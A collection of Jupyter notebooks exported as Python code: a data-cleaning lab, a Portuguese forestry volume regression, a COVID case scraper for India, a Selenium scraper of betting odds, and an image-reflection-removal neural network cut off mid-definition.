df['Backhoe_Mounting'].astype('category')\n\ndf['ProductGroup'].cat.codes\n\nprint(df['Tire_Size'].unique())\nprint(df['Undercarriage_Pad_Width'].unique())\n\ndf_normalize_strings(df, \"Tire_Size\")\ndf['Tire_Size'].unique()\n\ndf['Tire_Size'] = df['Tire_Size'].str.extract('([0-9.]*)') #regular expression\n\ndf['Tire_Size'].unique()\n\ndf['Tire_Size'] = df['Tire_Size'].astype(float)\n\ndf['Tire_Size'].unique()\n\n\ndef extract_sizes(df, colname):\n df[colname] = df[colname].str.extract('([0-9.]*)', expand=True)\n df[colname] = df[colname].replace('', np.nan) # empty -> NaN\n df[colname] = pd.to_numeric(df[colname]) # convert to number\n\n\nextract_sizes(df, 'Undercarriage_Pad_Width')\nprint(\"Tire_Size\", df['Tire_Size'].unique())\nprint(\"Undercarriage_Pad_Width\", df['Undercarriage_Pad_Width'].unique())\n\n# +\n\nm = df['Tire_Size'].median() # 20.5\ndf['Tire_Size'] = df['Tire_Size'].fillna(m)\ndf['Tire_Size'].unique()\n# -\n\ndf.query(\"MachineHoursCurrentMeter==0\")\n\ndf['saleyear'] = df['saledate'].dt.year\n\ndf['age'] = df['saleyear'] - df['YearMade'] #common in machine learning to help with when bought\n# and when made\n\nsum(df['age'] == 0), len(df)\n\ndf.query(\"MachineHoursCurrentMeter==0 and age>1\")\n\ninconsistent = df.eval(\"MachineHoursCurrentMeter==0 and age>1\")\n\ndf.loc[inconsistent, \"MachineHoursCurrentMeter\"] = np.nan\n\ndf.query(\"MachineHoursCurrentMeter==0 and age>1\")\n\n# ## Exercise 4\n\n# df[(df[colname] <= val) & (df[colname] > val) --> doing multiple where conditions, use paranthesis!!!\n\n# df.loc[df[colname] == val, colname] --> locate all rows with the columns equaling the value and take that column only and do something with it\n#\n# m = ax.scatter(x, y, color = df['col'], vmin = val, vmax = val) --> using scatter with a bunch of different colors for each of the points based on a column, vmin and vmax are cutoffs\n#\n# plt.colorbar(m) --> be able to show the colorbar with that particular coloring\n#\n# pd.to_datetime(df[col]) --> convert a column to a datetime\n#\n# datetimeobj.dt.dayofweek --> do a bunch of datetime operations on the datetime object\n#\n# df.groupby(colnames).func() --> group by a column and perform an aggregate function\n#\n# str.contains(string_val) --> see if a string contains the string value\n\n\n","repo_name":"surengunturumasters/USF_Bootcamp","sub_path":"Visualization/labs/lab-9-24.ipynb","file_name":"lab-9-24.ipynb","file_ext":"py","file_size_in_byte":8245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"14680885390","text":"# + id=\"QnuvhjDdirLn\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\n# + [markdown] id=\"kSy5yTQld9HR\"\n# #Cálculos necessários \n\n# + id=\"wjDx2PHkGp7b\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"24f5124c-7b9e-456b-8f66-75a1db407214\"\ncubagem_secao = pd.read_csv('/content/BR-SANTAVERONICA-DB-02 - Cubagem.csv', encoding='latin-1', sep =';', on_bad_lines='skip')\ncubagem_secao.columns \n\n# + id=\"TlTQzitPHKB6\"\n# cálculo da área secional\ncubagem_secao['AS'] = np.pi*(cubagem_secao['Diâmetro da secção'].pow(2)) / 40000\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"KHPcxQpTPxoa\" outputId=\"0fc07b7a-b4cb-4667-d7e8-350316ae37c3\"\n# cálculo Smalian para volume total \n\ncubagem_secao['Vtotalcasca'] = 0\n\nfor i in range(0,len(cubagem_secao['AS'])-1):\n \n if cubagem_secao['Código da Árvore'].loc[i] == cubagem_secao['Código da Árvore'].loc[i+1]:\n\n cubagem_secao['Vtotalcasca'].loc[i] = ((cubagem_secao['AS'].loc[i]+cubagem_secao['AS'].loc[1+i])/2)*(cubagem_secao['Altura da secção'].loc[i+1]-cubagem_secao['Altura da secção'].loc[i])\n\n else: \n\n cubagem_secao['Vtotalcasca'][i] = 0 \n\n# + id=\"njHx7Uh3hDof\"\nsoma = cubagem_secao[['Código da Árvore','V5casca','Vtotalcasca']].groupby('Código da Árvore').sum()\n\n# + id=\"4R63Mr5VhDt2\"\nmedia = cubagem_secao[['Código da Árvore','DAP', 'HT']].groupby('Código da Árvore').mean()\n\n# + id=\"TqoveinblCFN\"\ncubagem = pd.merge(media, soma, how = 'inner', on = 'Código da Árvore')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 238} id=\"p7MeBEj0lCKE\" outputId=\"b17eb675-0986-444a-fcd1-2f0b264321db\"\ncubagem.head() \n\n# + id=\"cTR4rl16abgb\"\ncubagem['lnDAP'] = np.log(cubagem['DAP'])\n\n# + id=\"xWjAiqGBabq6\"\ncubagem['lnHT'] = np.log(cubagem['HT'])\n\n# + id=\"Fn04HNARbBxb\"\ncubagem['lnVtcasca'] = np.log(cubagem['Vtotalcasca'])\n\n# + id=\"rsOAGjbtbB38\"\ncubagem['lnV5casca'] = np.log(cubagem['V5casca'])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 238} id=\"7t5ISpbHab45\" outputId=\"5c5f8639-4b3b-4307-c1fb-aa39194e514e\"\ncubagem.head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"CyuAde5-cADr\" outputId=\"ab0b9940-ab65-442d-a49b-f6ad53360955\"\ncubagem.columns\n\n# + id=\"GqNITNJQ7_Q5\"\n#cubagem.to_csv('Cubagem.csv')\n\n# + [markdown] id=\"-T1OJ7lFHfNQ\"\n# #Gráficos de tendência volume seção\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 434} id=\"yE8OSIYqHNaW\" outputId=\"c4027697-1ed8-499c-8a76-07888b3261d4\"\nfig, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(20,5))\n\nfont = {'family' : 'normal',\n 'weight' : 'bold',\n 'size' : 14}\n\nplt.rc('font', **font)\n\nprint('Gráfico de tendência ')\nprint('\\n')\n\nax1.plot(cubagem_secao['Altura da secção'],cubagem_secao['Diâmetro da secção'], 'o' )\nax2.plot(cubagem_secao['Altura da secção'],cubagem_secao['Vtotalcasca'], 'o')\nax3.plot(cubagem_secao['Altura da secção'],cubagem_secao['V5casca'], 'o')\n\nax1.set(title=\"A\", xlabel=\"\\nAltura da secção \", ylabel=\" Diâmetro da secção\");\n\nax2.set(title=\"B\", xlabel= f\"\\nAltura da secção\", ylabel=\" Volume comercial 5 cm com casca(m³)\");\n\nax3.set(title=\"C\", xlabel= f\"\\nAltura da secção\",ylabel=\" Volume comercial total com casca(m³)\");\n\n\n# + id=\"PJHsIPGbHK4R\"\n\n\n# + [markdown] id=\"H-yiNQ1zC5ps\"\n# #Gráficos de tendência volume totalizado\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 434} id=\"IKSYQzuKADp3\" outputId=\"0a6cdc1f-20e9-46ca-c58c-2402888a5c03\"\nfig, (ax1, ax2, ax3, ax4 ) = plt.subplots(1,4, figsize=(20,5))\n\nfont = {'family' : 'normal',\n 'weight' : 'bold',\n 'size' : 14}\n\nplt.rc('font', **font)\n\nprint('Gráfico de tendência ')\nprint('\\n')\n\nax1.plot(cubagem['DAP'],cubagem['V5casca'], 'o' )\n\nax2.plot(cubagem['HT'],cubagem['V5casca'], 'o')\n\nax3.plot(cubagem['DAP'],cubagem['Vtotalcasca'], 'o')\n\nax4.plot(cubagem['HT'],cubagem['Vtotalcasca'], 'o')\n\nax1.set(title=\"A\", xlabel=f\"\\nDiâmetro médio(cm)-DAP \", ylabel=\" Volume comercial 5 cm com casca(m³)\");\n\nax2.set(title=\"B\", xlabel= f\"\\n Altura total(m)-HD\");\n\nax3.set(title=\"C\", xlabel= f\"\\nDiâmetro médioc(cm)-DAP\",ylabel=\" Volume comercial total com casca(m³)\");\n\nax4.set(title=\"D\", xlabel= f\"\\nAltura total (m)-HT\");\n\n# + [markdown] id=\"WRuOSYLy8eKB\"\n# #Schumacher e Hall para os modelos volumétricos\n\n# + [markdown] id=\"J5dc8iCepwrh\"\n# ##Ajuste para volume total com casca\n\n# + id=\"CuBYRa35oby1\"\nX = cubagem[['lnDAP','lnHT']]\n\n# + id=\"WpeIZX09opyy\"\ny_Vtcasca = cubagem['lnVtcasca']\n\n# + id=\"vh3Wrd0Rob1x\"\nmodel_Vtcasca = LinearRegression().fit(X, y_Vtcasca)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"UYUmmw_1ob4o\" outputId=\"ddf421d4-9a82-407f-affd-fb08bbf4b103\"\nprint(\"Regressão Linear (original)\")\nprint(\"Coeficiente R^2 : {:.2f}\".format(model_Vtcasca.score(X, y_Vtcasca)))\n\nprint(\"Descrição do modelo: \")\ns = [\"{0:0.2f}\".format(v) for v in model_Vtcasca.coef_]\nprint(\"w: {} b: {:.2f}\".format(s, model_Vtcasca.intercept_))\n\n# + [markdown] id=\"wkEuB8Pap5QV\"\n# ## Ajuste para volume 5 com casca \n\n# + id=\"cnBmQCPNp68c\"\nX = cubagem[['lnDAP','lnHT']]\n\n# + id=\"RobeYngWwJd-\"\ny_lnV5cmcasca = cubagem['lnV5casca']\n\n# + id=\"E97m1REEwJg7\"\nmodel_lnV5cmcasca = LinearRegression().fit(X, y_lnV5cmcasca)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"C14FiMnfwJlc\" outputId=\"5be13b1f-7fc6-43af-b67d-31a8153f7c1c\"\nprint(\"Regressão Linear (original)\")\nprint(\"Coeficiente R^2 : {:.2f}\".format(model_lnV5cmcasca.score(X, y_lnV5cmcasca)))\n\nprint(\"Descrição do modelo: \")\ns = [\"{0:0.2f}\".format(v) for v in model_lnV5cmcasca.coef_]\nprint(\"w: {} b: {:.2f}\".format(s, model_lnV5cmcasca.intercept_))\n\n# + [markdown] id=\"xGGvHc-NoZun\"\n# #Predição\n\n# + id=\"9ipRnQAe4tCw\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 206} outputId=\"68eeb985-8ca6-4d44-961c-05a630463ea3\"\nestima_volume = pd.read_csv('/content/altura_predito.csv', encoding='latin-1', sep =';', on_bad_lines='skip')\nestima_volume.head()\n\n# + id=\"P9v785kQwJn-\"\nestima_volume['lnVtcasca'] = model_Vtcasca.intercept_ + model_Vtcasca.coef_[0]* np.log(estima_volume['DAP']) + model_Vtcasca.coef_[1] * np.log(estima_volume['Hest'])\n\n# + id=\"XxnGR0kMwJqh\"\nestima_volume['lnV5casca'] = model_lnV5cmcasca.intercept_+ model_lnV5cmcasca.coef_[0]* np.log(estima_volume['DAP']) + model_lnV5cmcasca.coef_[1] * np.log(estima_volume['Hest'])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"7fGlUuGcqnHi\" outputId=\"cab12b27-347b-4c30-80cb-7827951524ee\"\nestima_volume['Vtcasca'] = np.exp(estima_volume['lnVtcasca'])\nestima_volume['Vtcasca'].head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"P_C6eP10qnLC\" outputId=\"ee5dc898-951a-4117-8c80-ac458bf6439e\"\nestima_volume['V5casca'] = np.exp(estima_volume['lnV5casca'])\nestima_volume['V5casca'].head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"IgPpH3_2qnQI\" outputId=\"74348c65-d694-4416-82f3-bb8917343044\"\nestima_volume\n\n# + id=\"22-dt3iTMM-n\"\nestima_volume.to_csv('CalculoErroamostragem.csv')\n\n# + id=\"BkM4rRN4MNBE\"\n\n\n# + id=\"3VuHZBM_L3wq\"\n\n","repo_name":"ana181084/Desafio_treevia","sub_path":"Inventário Florestal/Processamento_python/volumetrico.ipynb","file_name":"volumetrico.ipynb","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"19446080512","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"5my_Tqqmb5lj\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 676} outputId=\"a305de3d-f289-44a1-8799-c413b485a471\"\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport requests\nfrom bs4 import BeautifulSoup\nfrom prettytable import PrettyTable\n\nurl = 'https://www.mohfw.gov.in/'\n# make a GET request to fetch the raw HTML content\nweb_content = requests.get(url).content\n# parse the html content\nsoup = BeautifulSoup(web_content, \"html.parser\")\n# remove any newlines and extra spaces from left and right\nextract_contents = lambda row: [x.text.replace('\\n', '') for x in row]\n# find all table rows and data cells within\nstats = [] \nall_rows = soup.find_all('tr')\nfor row in all_rows:\n stat = extract_contents(row.find_all('td')) \n# notice that the data that we require is now a list of length 5\n if len(stat) == 5:\n stats.append(stat)\n#now convert the data into a pandas dataframe for further processing\nnew_cols = [\"Sr.No\", \"States/UT\",\"Confirmed\",\"Recovered\",\"Deceased\"]\nstate_data = pd.DataFrame(data = stats, columns = new_cols)\nstate_data.head()\nstate_data[\"Confirmed\"] = state_data[\"Confirmed\"].map(int)\nstate_data[\"Recovered\"] = state_data[\"Recovered\"].map(int)\nstate_data[\"Deceased\"] = state_data[\"Deceased\"].map(int)\ntable = PrettyTable()\ntable.field_names = (new_cols)\nfor i in stats:\n table.add_row(i)\ntable.add_row([\"\",\"Total\",\n sum(state_data[\"Confirmed\"]), \n sum(state_data[\"Recovered\"]),\n sum(state_data[\"Deceased\"])])\nprint(table)\n\n\n# + id=\"sV2KjxI4cYt6\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 324} outputId=\"8db69b99-080a-4fb0-a8d9-7e96866b251f\"\ngroup_size = [sum(state_data['Confirmed']),\n sum(state_data['Recovered']),\n sum(state_data['Deceased'])]\ngroup_labels = ['Confirmed\\n' + str(sum(state_data['Confirmed'])),\n 'Recovered\\n' + str(sum(state_data['Recovered'])),\n 'Deceased\\n' + str(sum(state_data['Deceased']))]\ncustom_colors = ['skyblue','yellowgreen','tomato']\nplt.figure(figsize = (5,5))\nplt.pie(group_size, labels = group_labels, colors = custom_colors)\ncentral_circle = plt.Circle((0,0), 0.5, color = 'white')\nfig = plt.gcf()\nfig.gca().add_artist(central_circle)\nplt.rc('font', size = 12)\nplt.title('Nationwide total Confirmed, Recovered and Deceased Cases', fontsize = 20)\nplt.show()\n\n# + id=\"fEdHILdScdku\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 638} outputId=\"e24103a8-83ab-4256-bb3e-ba8b5cd53414\"\nsns.set_style('ticks')\nplt.figure(figsize = (15,10))\nplt.barh(state_data['States/UT'], state_data['Confirmed'].map(int),align = 'center', color = 'red', edgecolor = 'darkred')\nplt.xlabel('No. of Confirmed cases', fontsize = 18)\nplt.ylabel('States/UT', fontsize = 18)\nplt.gca().invert_yaxis()\nplt.xticks(fontsize = 14)\nplt.yticks(fontsize = 14)\nplt.title('Total Confirmed Cases Statewise', fontsize = 18 )\nfor index, value in enumerate(state_data['Confirmed']):\n plt.text(value, index, str(value), fontsize = 12)\nplt.show()\n","repo_name":"shreyrai99/Corona-Scrapper","sub_path":"CovidTrackerIndia.ipynb","file_name":"CovidTrackerIndia.ipynb","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"43827662160","text":"# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"EqpJw7O11cJC\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922362486, \"user_tz\": -120, \"elapsed\": 35844, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"c3729640-a10d-4751-9592-ba98f5714112\"\n# !pip install selenium\n# !apt-get update\n# !apt install chromium-chromedriver\n# !cp /usr/lib/chromium-browser/chromedriver /usr/bin\n\n# + id=\"F97OARdZYBlS\" colab={\"base_uri\": \"https://localhost:8080/\"} executionInfo={\"status\": \"ok\", \"timestamp\": 1660922431760, \"user_tz\": -120, \"elapsed\": 19914, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"9f021364-beca-4157-e2be-ae524f224f98\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + id=\"SM7_iL4_1ed7\"\nimport sys\nimport logging\nfrom selenium.webdriver.remote.remote_connection import LOGGER\nLOGGER.setLevel(logging.WARNING)\nsys.path.insert(0,'/usr/lib/chromium-browser/chromedriver')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom tqdm import tqdm_notebook as tqdm\nimport pandas\nimport json\nimport pprint\nimport time\n\n# + id=\"j81jY1ZQ1iLX\"\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\nchrome_options.add_argument('window-size=1900,800')\nchrome_options.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\")\n#PROXY = \"37.99.224.225:7497\"\n#webdriver.DesiredCapabilities.CHROME['proxy']={\n #\"httpProxy\":PROXY,\n #\"ftpProxy\":PROXY,\n #\"sslProxy\":PROXY,\n #\"proxyType\":\"MANUAL\"\n#}\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"cbpyzIAR12sW\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922439101, \"user_tz\": -120, \"elapsed\": 841, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"c86f9440-0ed9-46aa-dc64-8f1cb2adf462\"\nwd = webdriver.Chrome('chromedriver',chrome_options=chrome_options)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"ZBRxBG4x4gJK\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922448876, \"user_tz\": -120, \"elapsed\": 8410, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"8d251384-9554-473d-ddea-2cf9af845ee7\"\nwd.get(\"https://www.snai.it/\")\ntime.sleep(5)\n\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"0nbT21ki1vj2\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922527778, \"user_tz\": -120, \"elapsed\": 554, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"f7ee15e3-3fbb-486f-9275-4cf333e56adf\"\nbutton = wd.find_elements(by=By.CSS_SELECTOR, value=\"a.elementMenuNew01\")\nlen(button)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"PTcMm7qjDv70\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660921778547, \"user_tz\": -120, \"elapsed\": 290, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"3d347802-1311-47b0-b92f-194eb1ff74d7\"\nprint(button[0].text)\n\n# + id=\"cdtBsVAj28fX\"\nbutton2 = wd.find_elements(by=By.CSS_SELECTOR, value=\"button.btn-primary.accept-btn\")\nlen(button2)\nbutton2[0].click()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"uN4iW3y_B1xC\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922545074, \"user_tz\": -120, \"elapsed\": 1498, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"ec608949-9652-460f-d921-6be5c82c6c2c\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + id=\"n2ybXCY8G_yy\"\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.elementMenuNew01\")[0].click()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"DDN6DE7-KG9k\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922562827, \"user_tz\": -120, \"elapsed\": 1427, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"8d1c07a1-df0f-45c2-de94-e6ed7ece5755\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + id=\"yuAJ5afRKLYc\"\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.list-group-item.collapsed\")[0].click()\ntime.sleep(10)\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.list-group-item.ng-binding\")[24].click()\ntime.sleep(10)\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.list-group-item.ng-binding\")[25].click()\ntime.sleep(10)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"0QHSSfvXLx7e\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660923434239, \"user_tz\": -120, \"elapsed\": 1458, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"89219121-7dae-4aa2-ba34-ebb1daccb772\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + id=\"jJKpMml4Ap79\"\nwd.find_elements(by=By.CSS_SELECTOR, value=\"button.btn.btn-default.col-xs-3.btn-xs.ellipsis.ng-binding.ng-scope\")[17].click()\ntime.sleep(5)\nwd.find_elements(by=By.CSS_SELECTOR, value=\"button.btn.btn-default.col-xs-4.btn-xs.ellipsis.ng-binding.ng-scope\")[0].click()\ntime.sleep(5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"mtwVVyc4Ar6u\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660923660098, \"user_tz\": -120, \"elapsed\": 1462, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"1693b88d-0ad1-4d80-ef21-7b8d8638371a\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"dLXu3HBICF27\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660899111791, \"user_tz\": -120, \"elapsed\": 252, \"user\": {\"displayName\": \"Marco Di Rita\", \"userId\": \"10050403904916150248\"}} outputId=\"da536e48-9f36-46d2-c05f-d23d69b8ded0\"\nbutton3 = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")\nlen(button3)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"tKTspj5uCtQk\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660899113162, \"user_tz\": -120, \"elapsed\": 4, \"user\": {\"displayName\": \"Marco Di Rita\", \"userId\": \"10050403904916150248\"}} outputId=\"7ee3987e-3be7-4679-84b8-5a69696f840a\"\nprint(button3[0].text)\nprint(button3[1].text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"BvKJJAGkEiiY\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660899114578, \"user_tz\": -120, \"elapsed\": 4, \"user\": {\"displayName\": \"Marco Di Rita\", \"userId\": \"10050403904916150248\"}} outputId=\"0a3deec0-6ecd-41f5-e670-16c3287a1106\"\nlist_quote = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")\nprint(len(list_quote))\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"_l6EEMCxFAgQ\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660923742278, \"user_tz\": -120, \"elapsed\": 3799, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"86c467b2-0eef-4333-b4f6-4440e5b25e95\"\nimport pprint\ndetail_quote = []\nfor i in range(0, 66, 2):\n Team = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")[i].text\n Quota = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")[i+1].text\n\n detail_quote.append({'Quota': Quota,\n 'Team': Team})\n i = i+2\n\nlen(detail_quote)\npprint.pprint(detail_quote[0:10])\n\n# + id=\"iM4F22Yrx_XR\"\nimport pandas as pd\ndetail_quote = pd.DataFrame(detail_quote)\ndetail_quote.set_index(\"Team\")\ndetail_quote.head()\ndetail_quote.to_csv('snai.csv')\n","repo_name":"MarcoDiRita/Scraping","sub_path":"Scraping SNAI.ipynb","file_name":"Scraping SNAI.ipynb","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"37393717547","text":"# + id=\"pTST1R45Df88\"\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import Conv2D, concatenate, AveragePooling2D\nfrom tensorflow.keras.layers import Conv2DTranspose, Dropout, Concatenate\nfrom tensorflow.keras.layers import LeakyReLU, Activation, Flatten, Dense, Reshape, InputLayer, Input, MaxPooling2D, UpSampling2D\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.datasets.fashion_mnist import load_data\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras import backend as K\nimport cv2\nimport os\nimport matplotlib\nimport keras\nimport pandas as pd\nfrom google.colab.patches import cv2_imshow\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom google.colab.patches import cv2_imshow\nimport math\nfrom math import log10, sqrt\nfrom skimage.metrics import structural_similarity as ssim\nfrom copy import deepcopy\nimport random\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"nFRH7RpeDjEh\" outputId=\"ea65f440-12f2-49db-d715-a15fcdb27d10\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + id=\"HnNEdt0nDkay\"\n#train data\ntry:\n del imageNoise\n del imageClear\n del imageNoise_valid\n del imageClear_valid\nexcept Exception:\n pass\n#image with reflects\nimageClear = []\nimageNoise = []\nimage_clear_path = '/content/drive/MyDrive/baza/database/clear/'\nimage_noise_path = '/content/drive/MyDrive/baza/database/reflects/'\nfor image in os.listdir(image_clear_path):\n imageClear.append(cv2.imread(os.path.join(image_clear_path, image)))\n imageNoise.append(cv2.imread(os.path.join(image_noise_path, image)))\n\nimageClear = np.array(imageClear, dtype='object')\nimageNoise = np.array(imageNoise, dtype='object')\n\nimageClear = imageClear.astype('float32') / 255.\nimageNoise = imageNoise.astype('float32') / 255.\n\n#validation data\n#image with reflects\nimage_clear_valid_path = '/content/drive/MyDrive/baza/test_base/valid/true/'\nimage_noise_valid_path = '/content/drive/MyDrive/baza/test_base/valid/reflects/'\n\nimageClear_valid = []\nimageNoise_valid = []\nfor image in os.listdir(image_clear_valid_path):\n imageClear_valid.append(cv2.imread(os.path.join(image_clear_valid_path, image)))\n imageNoise_valid.append(cv2.imread(os.path.join(image_noise_valid_path, image)))\nimageNoise_valid = np.array(imageNoise_valid, dtype='object').astype('float32')\nimageClear_valid = np.array(imageClear_valid, dtype='object').astype('float32')\n\n\n\n\n\n\nimageNoise_valid = imageNoise_valid / 255.\nimageClear_valid = imageClear_valid / 255.\n#imageNoise_valid = np.array([prepare_image( imageClear_valid[idx] ) for idx in range(len(imageClear_valid))], dtype='object')\n#dataset normalization\n\n# + id=\"0ufblud4Gqah\"\n#model called trixie - UNet++ type\nclass My_Model_Arch():\n def __init__(self):\n self.kernel_size = ( 3, 3)\n def __prepare_model(self):\n kernel_size = self.kernel_size\n input = Input((256,256,3))\n conv1 = Conv2D(32, kernel_size = kernel_size, activation = 'relu', padding = 'same')(input)\n conv1_2 = Conv2D(32, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv1)\n conv1_concat = concatenate([conv1, conv1_2], axis = -1)#32\n pool1 = MaxPooling2D(pool_size = (2,2))(conv1_concat)\n conv2 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool1)\n conv2_1 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv2)\n conv2_concat = concatenate([conv2_1, conv2], axis = -1)#64\n\n pool2 = MaxPooling2D(pool_size = (2,2))(conv2_concat)\n conv3 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool2)\n conv3_1 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv3)\n conv3_concat = concatenate([conv3, conv3_1], axis = -1)#128\n\n pool3 = MaxPooling2D(pool_size = (2,2))(conv3_concat)\n conv4 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool3)\n conv4_1 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv4)\n conv4_concat = concatenate([conv4, conv4_1], axis = -1)#256\n\n pool4 = MaxPooling2D(pool_size = (2,2))(conv4_concat)\n conv5 = Conv2D(512, kernel_size = 